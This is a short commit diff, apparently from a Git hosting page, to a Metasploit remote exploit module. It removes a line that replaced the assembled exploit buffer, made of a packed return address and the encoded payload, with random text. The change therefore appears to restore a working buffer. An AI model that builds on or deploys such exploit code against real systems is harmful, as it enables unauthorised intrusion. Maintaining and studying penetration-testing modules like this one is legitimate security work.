parent
8ecafbc49e
commit
323ac17979
|
@ -107,8 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
sploit << [0x1002466D].pack("V")
|
sploit << [0x1002466D].pack("V")
|
||||||
sploit << payload.encoded
|
sploit << payload.encoded
|
||||||
|
|
||||||
sploit = rand_text(2000)
|
|
||||||
|
|
||||||
print_status "#{peer} - Trying target #{target.name}..."
|
print_status "#{peer} - Trying target #{target.name}..."
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
Loading…
Reference in New Issue